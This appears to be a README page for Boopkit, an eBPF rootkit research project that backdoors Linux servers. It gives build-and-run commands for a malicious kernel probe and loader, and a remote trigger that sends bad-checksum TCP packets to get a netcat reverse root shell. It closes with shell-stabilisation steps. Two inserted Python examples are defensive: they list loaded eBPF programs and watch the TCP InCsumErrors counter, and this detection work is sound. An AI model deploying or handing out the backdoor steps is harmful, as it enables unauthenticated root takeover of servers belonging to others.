Boopkit

A research project to demonstrate remote code injection over TCP with a malicious eBPF probe.

Disclaimer

I am a professional security researcher. These are white hat tools used for research purposes only.

Seriously, please use these responsibly.

Demo

Install boopkit on a server that is already running any TCP service (e.g. nginx, apache, tomcat).

git clone git@github.com:kris-nova/boopkit.git
cd boopkit
make
sudo ./boopkit > /var/log/boop.log &

Trigger a reverse shell over an existing TCP service. Edit the remote launcher script and point it at any TCP server running on the exploited machine.

# edit ./remote/remote as needed
./remote/remote
python -c "import pty; pty.spawn('/bin/bash')"

Enjoy the root shell over unauthenticated TCP.

Components

  • eBPF Probe: responsible for sending tracepoint/tcp/tcp_bad_csum events to userspace.
  • Malicious Userspace Program: persistent process in Linux that does the dirty work.
  • Remote Trigger: remote way to trigger the RCE over a network and a TCP server.

eBPF Probe

The probe is loaded into the kernel at runtime by the userspace loader program. It handles tcp/tcp_bad_csum tracepoint events and passes the saddr (source address) of the offending packet up to userspace through an eBPF map.

Loader Program

This is the malicious program that will respond to the bad checksum packets sent to the server. Whenever a malicious packet is sent, the loader program responds with remote code execution.
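The probe and loader above only work while a tracepoint program is resident in the kernel, which is also what a defender can inventory. The following is an added example for this page, not part of boopkit; it assumes the JSON printed by `bpftool -j prog show` carries at least the keys "id", "type", "name" and "tag" per program (all other keys are ignored), and the sample entries, ids, names and tags are constructed.

```python
"""Inventory loaded eBPF programs and flag the ones hooked into kernel tracing.

Added example, not boopkit code. Assumes `bpftool -j prog show` emits a JSON
array whose objects carry "id", "type", "name" and "tag"; other keys ignored.
"""
import json
import subprocess

# Program types that attach to kernel events (tracepoints, kprobes) rather
# than filtering packets or sockets. A tracing program that nobody can account
# for is the kind of thing a probe like the one described above would be.
TRACING_TYPES = frozenset({"tracepoint", "raw_tracepoint", "kprobe", "tracing"})

# Constructed sample in the shape of `bpftool -j prog show`. Every id, name
# and tag here is made up for this example.
SAMPLE_BPFTOOL_JSON = json.dumps([
    {"id": 7, "type": "cgroup_skb", "name": "egress_filter", "tag": "aaaaaaaaaaaaaaaa"},
    {"id": 8, "type": "cgroup_skb", "name": "ingress_filter", "tag": "bbbbbbbbbbbbbbbb"},
    {"id": 42, "type": "tracepoint", "name": "bad_csum_probe",
     "tag": "cccccccccccccccc", "map_ids": [3]},
])


def tracing_programs(programs):
    """Return [(id, type, name), ...] for programs whose type is in TRACING_TYPES."""
    found = []
    for prog in programs:
        if prog.get("type") in TRACING_TYPES:
            found.append((prog["id"], prog["type"], prog.get("name", "")))
    return found


def diff_inventory(baseline_tags, programs):
    """Return programs whose instruction tag is absent from a recorded baseline.

    The tag is a hash of the program's instructions, so it stays stable across
    reloads while the numeric id does not; baseline on tags, not ids.
    """
    known = set(baseline_tags)
    return [p for p in programs if p.get("tag") not in known]


def live_programs():
    """Query the running kernel through bpftool (needs root and bpftool installed)."""
    out = subprocess.run(["bpftool", "-j", "prog", "show"],
                         capture_output=True, text=True, check=True).stdout
    return json.loads(out)


if __name__ == "__main__":
    # Replace the sample with live_programs() on a real host.
    progs = json.loads(SAMPLE_BPFTOOL_JSON)
    baseline = {"aaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbb"}  # tags recorded at a known-good time
    for prog_id, prog_type, name in tracing_programs(progs):
        print(f"tracing program: id={prog_id} type={prog_type} name={name}")
    for prog in diff_inventory(baseline, progs):
        print(f"not in baseline: id={prog['id']} name={prog.get('name', '')}")
```

Record the tag set from a host in a known-good state and compare against it on a schedule; a new tracepoint or kprobe program that appears outside a change window is what to investigate, and the map it exports (`map_ids`) can be inspected with the same tool.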

Trigger/Remote

The trigger binary is a small C program that sends the server a SYN segment whose TCP checksum is deliberately wrong.

The remote script wraps the trigger and will use netcat to listen for a reverse shell.
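The trigger depends on the kernel rejecting a segment for a bad TCP checksum, and that rejection is counted in the kernel's own SNMP statistics: the InCsumErrors field on the "Tcp:" line of /proc/net/snmp increments on the same checksum-failure path, so a defender sees the trigger without loading any eBPF of their own. The following is an added example for this page, not part of boopkit; the two /proc/net/snmp snapshots are constructed, and on a live host read_snmp() reads the real file.

```python
"""Watch the kernel's TCP InCsumErrors counter for bad-checksum segments.

Added example, not boopkit code. Parses /proc/net/snmp, where each protocol
has a header line of field names followed by a line of values.
"""
import time

# Constructed snapshot of /proc/net/snmp (abbreviated Ip/Udp lines; only the
# "Tcp:" pair matters here). Values are made up for this example.
SNMP_BEFORE = """\
Ip: Forwarding DefaultTTL InReceives InHdrErrors InAddrErrors
Ip: 1 64 51234 0 0
Tcp: RtoAlgorithm RtoMin RtoMax MaxConn ActiveOpens PassiveOpens AttemptFails EstabResets CurrEstab InSegs OutSegs RetransSegs InErrs OutRsts InCsumErrors
Tcp: 1 200 120000 -1 310 122 4 2 6 48211 47190 12 0 9 0
Udp: InDatagrams NoPorts InErrors OutDatagrams
Udp: 2210 3 0 2201
"""

# Same host a few seconds later, after five segments failed their checksum.
SNMP_AFTER = SNMP_BEFORE.replace(
    "Tcp: 1 200 120000 -1 310 122 4 2 6 48211 47190 12 0 9 0",
    "Tcp: 1 200 120000 -1 310 122 4 2 6 48216 47190 12 5 9 5",
)


def parse_snmp(text):
    """Return {protocol: {field_name: int}} from /proc/net/snmp text."""
    headers = {}
    counters = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        proto, rest = line.split(":", 1)
        fields = rest.split()
        if proto not in headers:
            headers[proto] = fields            # first line per protocol: names
        else:
            counters[proto] = dict(zip(headers[proto], map(int, fields)))
    return counters


def csum_errors(text):
    """TCP segments dropped for a bad checksum since boot (per network namespace)."""
    return parse_snmp(text)["Tcp"]["InCsumErrors"]


def bad_csum_delta(before, after):
    """How many bad-checksum TCP segments arrived between two snapshots."""
    return csum_errors(after) - csum_errors(before)


def read_snmp(path="/proc/net/snmp"):
    with open(path) as f:
        return f.read()


def watch(interval=5.0, threshold=1, reader=read_snmp):
    """Poll and report whenever InCsumErrors rises by >= threshold in one interval."""
    prev = reader()
    while True:
        time.sleep(interval)
        cur = reader()
        delta = bad_csum_delta(prev, cur)
        if delta >= threshold:
            print(f"{delta} bad-checksum TCP segment(s) in the last {interval:.0f}s")
        prev = cur


if __name__ == "__main__":
    print(f"constructed sample: delta = {bad_csum_delta(SNMP_BEFORE, SNMP_AFTER)}")
    # On a real host: watch()
```

On a healthy host this counter barely moves, so even a handful of increments in one interval is worth correlating with a packet capture of the arriving SYNs and with the eBPF program inventory; the counter is per network namespace, so run the watcher in the namespace that owns the listening service.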

eBPF and Loader Compile Time Dependencies

  • clang
  • linux-headers
  • llvm
  • libbpf
  • lib32-glibc

Boopkit runtime dependencies

  • Linux kernel with eBPF enabled/supported
  • Ncat running on the server
  • Root access :)

Reverse Shell Stabilization

After a successful run of ./remote/remote the shell will be very unsightly.

Select one of the commands to run in order to start a cleaner shell.

python -c "import pty; pty.spawn('/bin/bash')"
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash';"

Next move the newly created shell to the background on your local terminal.

Ctrl + z

Update the stty locally.

stty raw -echo && fg

Finally, reconfigure the terminal!

export TERM=xterm-256color

Source: jasonturley.xyz
